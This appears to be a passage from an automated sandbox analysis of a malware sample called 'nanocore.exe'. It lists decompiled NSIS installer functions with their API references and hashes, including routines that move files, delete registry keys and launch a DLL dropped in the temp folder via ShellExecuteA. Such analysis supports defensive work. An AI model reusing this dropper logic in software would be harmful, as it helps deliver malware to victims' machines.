            • CharNextA.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C65
            • CharPrevA.USER32(?,?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C75
            Strings
            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BFB, 00405BFC
            • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00405C37
            • *?|<>/":, xrefs: 00405C43
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: Char$Next$Prev
            • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.
            • API String ID: 589700163-562438032
            • Opcode ID: c3e6b7e6cb13a4bbd62a9e478f04b3777cedf0421140d3393f81b5e1ccfcad21
            • Instruction ID: 741f4f1766c378bb4ac774d7bbda26dd0b1b0e4f9567a31439ebc024b01f0e93
            • Opcode Fuzzy Hash: c3e6b7e6cb13a4bbd62a9e478f04b3777cedf0421140d3393f81b5e1ccfcad21
            • Instruction Fuzzy Hash: 7B11D05180CB9429FB3216284D44BBB7B98CB9B760F18047BE9C4722C2D67C5C828B6D
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00403E0E(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
            				struct tagLOGBRUSH _v16;
            				long _t35;
            				long _t37;
            				void* _t40;
            				long* _t49;
            
            				if(_a4 + 0xfffffecd > 5) {
            					L15:
            					return 0;
            				}
            				_t49 = GetWindowLongA(_a12, 0xffffffeb);
            				if(_t49 == 0) {
            					goto L15;
            				}
            				_t35 =  *_t49;
            				if((_t49[5] & 0x00000002) != 0) {
            					_t35 = GetSysColor(_t35);
            				}
            				if((_t49[5] & 0x00000001) != 0) {
            					SetTextColor(_a8, _t35);
            				}
            				SetBkMode(_a8, _t49[4]);
            				_t37 = _t49[1];
            				_v16.lbColor = _t37;
            				if((_t49[5] & 0x00000008) != 0) {
            					_t37 = GetSysColor(_t37);
            					_v16.lbColor = _t37;
            				}
            				if((_t49[5] & 0x00000004) != 0) {
            					SetBkColor(_a8, _t37);
            				}
            				if((_t49[5] & 0x00000010) != 0) {
            					_v16.lbStyle = _t49[2];
            					_t40 = _t49[3];
            					if(_t40 != 0) {
            						DeleteObject(_t40);
            					}
            					_t49[3] = CreateBrushIndirect( &_v16);
            				}
            				return _t49[3];
            			}

            APIs
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
            • String ID:
            • API String ID: 2320649405-0
            • Opcode ID: c97ffb24e4734704427e7b606a740b4fab5c3533c49fee8400ef737fc9d4ca7c
            • Instruction ID: 944c776da9ffcbc306ecb8e42b0009ed864c9b653f4a8b06b4458955b6ce273b
            • Opcode Fuzzy Hash: c97ffb24e4734704427e7b606a740b4fab5c3533c49fee8400ef737fc9d4ca7c
            • Instruction Fuzzy Hash: 25214F71904744ABCB219F68DD08B5BBFF8AF00715B048A69F895E22E1D738EA04CB95
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 78%
            			E0040166B() {
            				int _t18;
            				void* _t28;
            				void* _t35;
            
            				 *(_t35 + 8) = E00402A9A(0xffffffd0);
            				 *(_t35 - 8) = E00402A9A(0xffffffdf);
            				E004059BF(0x40a018,  *(_t35 + 8));
            				_t18 = lstrlenA( *(_t35 - 8));
            				if(_t18 + lstrlenA( *(_t35 + 8)) < 0x3fd) {
            					lstrcatA(0x40a018, 0x40901c);
            					lstrcatA(0x40a018,  *(_t35 - 8));
            				}
            				if(MoveFileA( *(_t35 + 8),  *(_t35 - 8)) == 0) {
            					if( *((intOrPtr*)(_t35 - 0x1c)) == _t28 || E00405C94( *(_t35 + 8)) == 0) {
            						 *((intOrPtr*)(_t35 - 4)) = 1;
            					} else {
            						E00405707( *(_t35 + 8),  *(_t35 - 8));
            						_push(0xffffffe4);
            						goto L7;
            					}
            				} else {
            					_push(0xffffffe3);
            					L7:
            					E00401428();
            				}
            				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t35 - 4));
            				return 0;
            			}

            APIs
              • Part of subcall function 004059BF: lstrcpynA.KERNEL32(?,?,00000400,0040319C,007A2780,NSIS Error), ref: 004059CC
            • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\nsj42E4.tmp\4rmzuajr4dtt.dll,?,000000DF,000000D0), ref: 00401690
            • lstrlenA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsj42E4.tmp\4rmzuajr4dtt.dll,?,000000DF,000000D0), ref: 0040169A
            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsj42E4.tmp\4rmzuajr4dtt.dll,0040901C,?,?,C:\Users\user\AppData\Local\Temp\nsj42E4.tmp\4rmzuajr4dtt.dll,?,000000DF,000000D0), ref: 004016AF
            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsj42E4.tmp\4rmzuajr4dtt.dll,?,C:\Users\user\AppData\Local\Temp\nsj42E4.tmp\4rmzuajr4dtt.dll,0040901C,?,?,C:\Users\user\AppData\Local\Temp\nsj42E4.tmp\4rmzuajr4dtt.dll,?,000000DF,000000D0), ref: 004016B8
              • Part of subcall function 00405C94: SetErrorMode.KERNELBASE(00008001,00000000,007A0988,C:\Users\user\AppData\Local\Temp\,004055EF,007A0988,007A0988,00000000,007A0988,007A0988,?,?,00000000,00405315,?,C:\Users\user\Desktop\nanocore.exe 0), ref: 00405CA2
              • Part of subcall function 00405C94: FindFirstFileA.KERNELBASE(?,007A15D0), ref: 00405CAE
              • Part of subcall function 00405C94: SetErrorMode.KERNELBASE(00000000), ref: 00405CB8
              • Part of subcall function 00405C94: FindClose.KERNELBASE(00000000), ref: 00405CC0
              • Part of subcall function 00405707: CloseHandle.KERNEL32(00000000,?,00000000,00000001,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054BC,?,00000000,000000F1,?), ref: 0040575C
              • Part of subcall function 00405707: GetShortPathNameA.KERNEL32(?,007A1710,00000400), ref: 00405765
              • Part of subcall function 00405707: GetShortPathNameA.KERNEL32(00000000,007A1188,00000400), ref: 00405782
              • Part of subcall function 00405707: wsprintfA.USER32 ref: 004057A0
              • Part of subcall function 00405707: GetWindowsDirectoryA.KERNEL32(007A1188,000003F0,?,?,00000000,000000F1,?), ref: 004057B1
              • Part of subcall function 00405707: lstrcatA.KERNEL32(007A1188,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057BD
              • Part of subcall function 00405707: CreateFileA.KERNEL32(007A1188,C0000000,00000000,00000000,00000004,08000080,00000000,007A1188,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057D4
              • Part of subcall function 00405707: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,000000F1,?), ref: 004057E8
              • Part of subcall function 00405707: GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004057F7
              • Part of subcall function 00405707: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 0040580D
            • MoveFileA.KERNEL32(?,?), ref: 004016C3
            Strings
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: File$lstrcat$CloseErrorFindModeNamePathShortlstrlen$AllocCreateDirectoryFirstGlobalHandleMoveReadSizeWindowslstrcpynwsprintf
            • String ID: C:\Users\user\AppData\Local\Temp\nsj42E4.tmp\4rmzuajr4dtt.dll
            • API String ID: 2621199633-2804884011
            • Opcode ID: e34dedb074c22f8b75bca2a446b82d177209b2bfd9f99b0c9f35470352dc7494
            • Instruction ID: fea5f1e5da9c35cb7cab6b6f1408056446a07f0d4044b317f115ce8379a8f22b
            • Opcode Fuzzy Hash: e34dedb074c22f8b75bca2a446b82d177209b2bfd9f99b0c9f35470352dc7494
            • Instruction Fuzzy Hash: 7D11A031904214FBCF016FA2CD0899E3A62EF41368F20413BF401751E1DA3D8A81AF5D
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00404627(struct HWND__* _a4, intOrPtr _a8) {
            				long _v8;
            				signed char _v12;
            				unsigned int _v16;
            				void* _v20;
            				intOrPtr _v24;
            				long _v56;
            				void* _v60;
            				long _t15;
            				unsigned int _t19;
            				signed int _t25;
            				struct HWND__* _t28;
            
            				_t28 = _a4;
            				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
            				if(_a8 == 0) {
            					L4:
            					_v56 = _t15;
            					_v60 = 4;
            					SendMessageA(_t28, 0x110c, 0,  &_v60);
            					return _v24;
            				}
            				_t19 = GetMessagePos();
            				_v16 = _t19 >> 0x10;
            				_v20 = _t19;
            				ScreenToClient(_t28,  &_v20);
            				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
            				if((_v12 & 0x00000066) != 0) {
            					_t15 = _v8;
            					goto L4;
            				}
            				return _t25 | 0xffffffff;
            			}

            APIs
            • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404642
            • GetMessagePos.USER32 ref: 0040464A
            • ScreenToClient.USER32 ref: 00404664
            • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404676
            • SendMessageA.USER32(?,0000110C,00000000,?), ref: 0040469C
            Strings
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: Message$Send$ClientScreen
            • String ID: f
            • API String ID: 41195575-1993550816
            • Opcode ID: a62ee4c6f8744dddd87d0a1d61b58e140f64d2c7e8211fa38f6ec5a760cc9808
            • Instruction ID: cc273b5f7af9833ca02a78eb85435134e40410870e31f3474614dd8078ab484b
            • Opcode Fuzzy Hash: a62ee4c6f8744dddd87d0a1d61b58e140f64d2c7e8211fa38f6ec5a760cc9808
            • Instruction Fuzzy Hash: 0A015271D00218BADB00DB94DC85BFFBBBCAB55711F10412BBB00B62C0D7B869418BA5
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00402BAB(struct HWND__* _a4, intOrPtr _a8, CHAR* _a16) {
            				int _t7;
            				int _t15;
            				struct HWND__* _t16;
            
            				_t16 = _a4;
            				if(_a8 == 0x110) {
            					SetTimer(_t16, 1, 0xfa, 0);
            					_a8 = 0x113;
            					 *0x40b020 = _a16;
            				}
            				if(_a8 == 0x113) {
            					_t15 =  *0x789930; // 0x4e6c2
            					_t7 =  *0x79d938; // 0x4e6c6
            					if(_t15 >= _t7) {
            						_t15 = _t7;
            					}
            					wsprintfA(0x7898f0,  *0x40b020, MulDiv(_t15, 0x64, _t7));
            					SetWindowTextA(_t16, 0x7898f0);
            					SetDlgItemTextA(_t16, 0x406, 0x7898f0);
            					ShowWindow(_t16, 5);
            				}
            				return 0;
            			}

            APIs
            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402BCB
            • MulDiv.KERNEL32(0004E6C2,00000064,0004E6C6), ref: 00402BF6
            • wsprintfA.USER32 ref: 00402C09
            • SetWindowTextA.USER32(?,007898F0), ref: 00402C14
            • SetDlgItemTextA.USER32 ref: 00402C21
            • ShowWindow.USER32(?,00000005,?,00000406,007898F0), ref: 00402C29
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: TextWindow$ItemShowTimerwsprintf
            • String ID:
            • API String ID: 559026099-0
            • Opcode ID: 6bb25f70a1653d38713b2b3ce1117d23bb5b874e0913eb29b27a21d06f6436fe
            • Instruction ID: fbe1f7977b8df494303572dcbb2cbc4cea34e2fcb0be9a91995bb721301161c2
            • Opcode Fuzzy Hash: 6bb25f70a1653d38713b2b3ce1117d23bb5b874e0913eb29b27a21d06f6436fe
            • Instruction Fuzzy Hash: F0017531940214ABD7116F15AD49FBB3B68EB45721F00403AFA05B62D0D7B86851DBA9
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 64%
            			E00401E34() {
            				signed int _t7;
            				void* _t19;
            				char* _t20;
            				signed int _t24;
            				void* _t26;
            
            				_t24 = E00402A9A(_t19);
            				_t20 = E00402A9A(0x31);
            				_t7 = E00402A9A(0x22);
            				_push(_t20);
            				_push(_t24);
            				_t22 = _t7;
            				wsprintfA("C:\Users\jones\AppData\Local\Temp\nsj42E4.tmp\4rmzuajr4dtt.dll", "%s %s");
            				E00401428(0xffffffec);
            				asm("sbb eax, eax");
            				asm("sbb eax, eax");
            				if(ShellExecuteA( *(_t26 - 8),  ~( *_t24) & _t24, _t20,  ~( *_t7) & _t22, "C:\\Users\\jones\\AppData\\Local\\Temp",  *(_t26 - 0x18)) < 0x21) {
            					 *((intOrPtr*)(_t26 - 4)) = 1;
            				}
            				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t26 - 4));
            				return 0;
            			}

            APIs
            • wsprintfA.USER32 ref: 00401E5A
            • ShellExecuteA.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Local\Temp,?), ref: 00401E88
            Strings
            • C:\Users\user\AppData\Local\Temp\nsj42E4.tmp\4rmzuajr4dtt.dll, xrefs: 00401E53
            • %s %s, xrefs: 00401E4E
            • C:\Users\user\AppData\Local\Temp, xrefs: 00401E73
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: ExecuteShellwsprintf
            • String ID: %s %s$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsj42E4.tmp\4rmzuajr4dtt.dll
            • API String ID: 2956387742-3685331131
            • Opcode ID: 05d836665ae50fce2707af320b19060b42cd68dfbfcf627df7f78d71aa10da7e
            • Instruction ID: ce03d906cf3866787b37d6904cdbd79c6318199a3569b7a51aa2d89d7359fd60
            • Opcode Fuzzy Hash: 05d836665ae50fce2707af320b19060b42cd68dfbfcf627df7f78d71aa10da7e
            • Instruction Fuzzy Hash: ADF0F471B042006EC711AFB59D4EE6E3AA8DB42319B200837F001F61D3D5BD88519768
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00402ADA(void* _a4, char* _a8, intOrPtr _a12) {
            				void* _v8;
            				char _v272;
            				long _t14;
            
            				_t14 = RegOpenKeyExA(_a4, _a8, 0, 8,  &_v8);
            				if(_t14 == 0) {
            					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
            						if(_a12 != 0) {
            							RegCloseKey(_v8);
            							return 1;
            						}
            						if(E00402ADA(_v8,  &_v272, 0) != 0) {
            							break;
            						}
            					}
            					RegCloseKey(_v8);
            					return RegDeleteKeyA(_a4, _a8);
            				}
            				return _t14;
            			}

            APIs
            • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000008,?), ref: 00402AF5
            • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402B31
            • RegCloseKey.ADVAPI32(?), ref: 00402B3A
            • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B46
            • RegCloseKey.ADVAPI32(?), ref: 00402B56
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: Close$DeleteEnumOpen
            • String ID:
            • API String ID: 1912718029-0
            • Opcode ID: 0ec0c72ac22d197f92e3eb34b47e7c738ded362e1e52db29065c5b2891b64f43
            • Instruction ID: 075d0217e77777f9092c7514f2922301dec465e9e1858cbb0099f988ba13f04e
            • Opcode Fuzzy Hash: 0ec0c72ac22d197f92e3eb34b47e7c738ded362e1e52db29065c5b2891b64f43
            • Instruction Fuzzy Hash: 02012572900108FFDB21AF90DE88DAF7B7DEB44384F108572BA01A10A0D7B4AE55AB65
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00401D32() {
            				void* _t18;
            				struct HINSTANCE__* _t22;
            				struct HWND__* _t25;
            				void* _t27;
            
            				_t25 = GetDlgItem( *(_t27 - 8),  *(_t27 - 0x20));
            				GetClientRect(_t25, _t27 - 0x40);
            				_t18 = SendMessageA(_t25, 0x172, _t22, LoadImageA(_t22, E00402A9A(_t22), _t22,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
            				if(_t18 != _t22) {
            					DeleteObject(_t18);
            				}
            				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t27 - 4));
            				return 0;
            			}

            APIs
            • GetDlgItem.USER32 ref: 00401D38
            • GetClientRect.USER32 ref: 00401D45
            • LoadImageA.USER32 ref: 00401D66
            • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D74
            • DeleteObject.GDI32(00000000), ref: 00401D83
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
            • String ID:
            • API String ID: 1849352358-0
            • Opcode ID: dac48a23ca69c3059e9ed47d02cf7cf39d3eefcb1fcb610c0a571ddde2ae894b
            • Instruction ID: 24e3e63a5c7369e1328c4ed5f53ad3de25e73d2730998e74081e515a34f76845
            • Opcode Fuzzy Hash: dac48a23ca69c3059e9ed47d02cf7cf39d3eefcb1fcb610c0a571ddde2ae894b
            • Instruction Fuzzy Hash: 7DF0FFB2A04115BFDB01DBE4EE88DAF77BDEB08311B105466F601F6191C7789D418B29
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 35%
            			E00404545(int _a4, intOrPtr _a8, unsigned int _a12) {
            				char _v36;
            				char _v68;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				void* _t26;
            				void* _t34;
            				signed int _t36;
            				signed int _t39;
            				unsigned int _t46;
            
            				_t46 = _a12;
            				_push(0x14);
            				_pop(0);
            				_t34 = 0xffffffdc;
            				if(_t46 < 0x100000) {
            					_push(0xa);
            					_pop(0);
            					_t34 = 0xffffffdd;
            				}
            				if(_t46 < 0x400) {
            					_t34 = 0xffffffde;
            				}
            				if(_t46 < 0xffff3333) {
            					_t39 = 0x14;
            					asm("cdq");
            					_t46 = _t46 + 1 / _t39;
            				}
            				_push(E004059E1(_t34, 0, _t46,  &_v36, 0xffffffdf));
            				_push(E004059E1(_t34, 0, _t46,  &_v68, _t34));
            				_t21 = _t46 & 0x00ffffff;
            				_t36 = 0xa;
            				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
            				_push(_t46 >> 0);
            				_t26 = E004059E1(_t34, 0, 0x79f580, 0x79f580, _a8);
            				wsprintfA(_t26 + lstrlenA(0x79f580), "%u.%u%s%s");
            				return SetDlgItemTextA( *0x7a2758, _a4, 0x79f580);
            			}

            APIs
            • lstrlenA.KERNEL32(0079F580,0079F580,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404465,000000DF,?,00000000,00000400), ref: 004045D3
            • wsprintfA.USER32 ref: 004045DB
            • SetDlgItemTextA.USER32 ref: 004045EE
            Strings
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: ItemTextlstrlenwsprintf
            • String ID: %u.%u%s%s
            • API String ID: 3540041739-3551169577
            • Opcode ID: 1889a7adf10d335a807e3f6632fec442bbf7daaf42d867185502e520216b2d79
            • Instruction ID: e1fe79347d8d052d3bbdd742c897f6fd786447eee0d7872ec31327a957c1f8d6
            • Opcode Fuzzy Hash: 1889a7adf10d335a807e3f6632fec442bbf7daaf42d867185502e520216b2d79
            • Instruction Fuzzy Hash: 35110473A0012477DB00666D9C46EAF3689CBC6374F14023BFA25F61D1E9788C1186A8
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 54%
            			E00401C19(void* __ecx) {
            				signed int _t30;
            				CHAR* _t33;
            				long _t34;
            				int _t39;
            				signed int _t40;
            				int _t44;
            				void* _t46;
            				int _t51;
            				struct HWND__* _t55;
            				void* _t58;
            
            				_t46 = __ecx;
            				 *(_t58 - 8) = E00402A9A(0x33);
            				 *(_t58 + 8) = E00402A9A(0x44);
            				if(( *(_t58 - 0x10) & 0x00000001) == 0) {
            					 *((intOrPtr*)(__ebp - 8)) = E00405936(__ecx,  *((intOrPtr*)(__ebp - 8)));
            				}
            				__eflags =  *(_t58 - 0x10) & 0x00000002;
            				if(( *(_t58 - 0x10) & 0x00000002) == 0) {
            					 *(_t58 + 8) = E00405936(_t46,  *(_t58 + 8));
            				}
            				__eflags =  *((intOrPtr*)(_t58 - 0x28)) - 0x21;
            				_push(1);
            				if(__eflags != 0) {
            					_t53 = E00402A9A();
            					_t30 = E00402A9A();
            					asm("sbb ecx, ecx");
            					asm("sbb eax, eax");
            					_t33 =  ~( *_t29) & _t53;
            					__eflags = _t33;
            					_t34 = FindWindowExA( *(_t58 - 8),  *(_t58 + 8), _t33,  ~( *_t30) & _t30);
            					goto L10;
            				} else {
            					_t55 = E00402A7D();
            					_t39 = E00402A7D();
            					_t51 =  *(_t58 - 0x10) >> 2;
            					if(__eflags == 0) {
            						_t34 = SendMessageA(_t55, _t39,  *(_t58 - 8),  *(_t58 + 8));
            						L10:
            						 *(_t58 - 0x34) = _t34;
            					} else {
            						_t40 = SendMessageTimeoutA(_t55, _t39,  *(_t58 - 8),  *(_t58 + 8), _t44, _t51, _t58 - 0x34);
            						asm("sbb eax, eax");
            						 *((intOrPtr*)(_t58 - 4)) =  ~_t40 + 1;
            					}
            				}
            				__eflags =  *((intOrPtr*)(_t58 - 0x24)) - _t44;
            				if( *((intOrPtr*)(_t58 - 0x24)) >= _t44) {
            					_push( *(_t58 - 0x34));
            					E0040591D();
            				}
            				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t58 - 4));
            				return 0;
            			}

            0x00401c19
            0x00401c22
            0x00401c2e
            0x00401c31
            0x00401c3b
            0x00401c3b
            0x00401c3e
            0x00401c42
            0x00401c4c
            0x00401c4c
            0x00401c4f
            0x00401c53
            0x00401c55
            0x00401ca2
            0x00401ca4
            0x00401cad
            0x00401cb5
            0x00401cb8
            0x00401cb8
            0x00401cc1
            0x00000000
            0x00401c57
            0x00401c5e
            0x00401c60
